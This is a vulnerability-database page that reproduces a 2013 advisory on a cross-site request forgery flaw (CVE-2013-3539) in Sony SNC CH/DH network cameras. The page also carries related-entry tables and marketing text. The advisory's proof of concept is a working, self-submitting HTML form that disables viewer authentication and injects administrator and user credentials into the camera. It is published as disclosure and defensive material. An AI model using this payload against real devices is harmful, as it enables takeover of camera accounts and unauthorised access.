Vulners
Lucene search
Sony CH / DH Cross Site Request Forgery
🗓️ 13 Jun 2013 00:00:00Reported by Jonas Rapero CastilloType 
packetstorm🔗 packetstormsecurity.com👁 43 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Sony CH / DH Cross Site Request Forgery Vulnerability | 14 Jun 201300:00 | – | zdt |
 | CVE-2013-3539 | 12 Jun 201300:00 | – | circl |
 | CVE-2013-3539 | 1 Oct 201319:00 | – | cve |
| CVE-2013-3964 | 1 Oct 201319:00 | – | cve |
 | CVE-2013-3539 | 1 Oct 201319:00 | – | cvelist |
| CVE-2013-3964 | 1 Oct 201319:00 | – | cvelist |
 | EUVD-2013-3474 | 7 Oct 202500:30 | – | euvd |
| EUVD-2013-3896 | 7 Oct 202500:30 | – | euvd |
 | CVE-2013-3539 | 1 Oct 201319:55 | – | nvd |
| CVE-2013-3964 | 1 Oct 201319:55 | – | nvd |
10
`===========================================================================
SONY
====================================================================
===========================================================================
1.Advisory Information
Title: Sony CH, DH Series Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
We have been found the next vulnerability in this devices
-CVE-2013-3539. Cross Site Request Forgery(CWE-352)
3.Affected Products
CVE-2013-3539, the following product are affected SNC CH140, SNC CH180, SNC CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and SNC DH280.
Its possible others models are affected but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3539, CSRF via POST method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
This is our .html attack.
_____________________________________________________________________________
<html>
<body>
<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
<input type="Select" name="ViewerModeDefault" value="00000fff">
<input type="Hidden" name="ViewerAuthen" value="off">
<input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
<input type="Hidden" name="User1" value="xxxx,c0000fff">
<input type="Hidden" name="User2" value="xxxx,c0000fff">
<input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
<input type="Hidden" name="User4" value="Og==,00000fff">
<input type="Hidden" name="User5" value="Og==,00000fff">
<input type="Hidden" name="User6" value="Og==,00000fff">
<input type="Hidden" name="User7" value="Og==,00000fff">
<input type="Hidden" name="User8" value="Og==,00000fff">
<input type="Hidden" name="User9" value="Og==,00000fff">
<input type="Hidden" name="Reload" value="referer">
<script>document.SonyCsRf.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
Now we can check that we have a new user in the configuration.
5.Credits
CVE-2013-3539 was discovered by Jonás Ropero Castillo. .
6.Report Timeline
-2013-05-25: Students team notifies the Sony Customer Support of the vulnerability. No reply received.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jun 2013 00:00Current
EPSS0.0143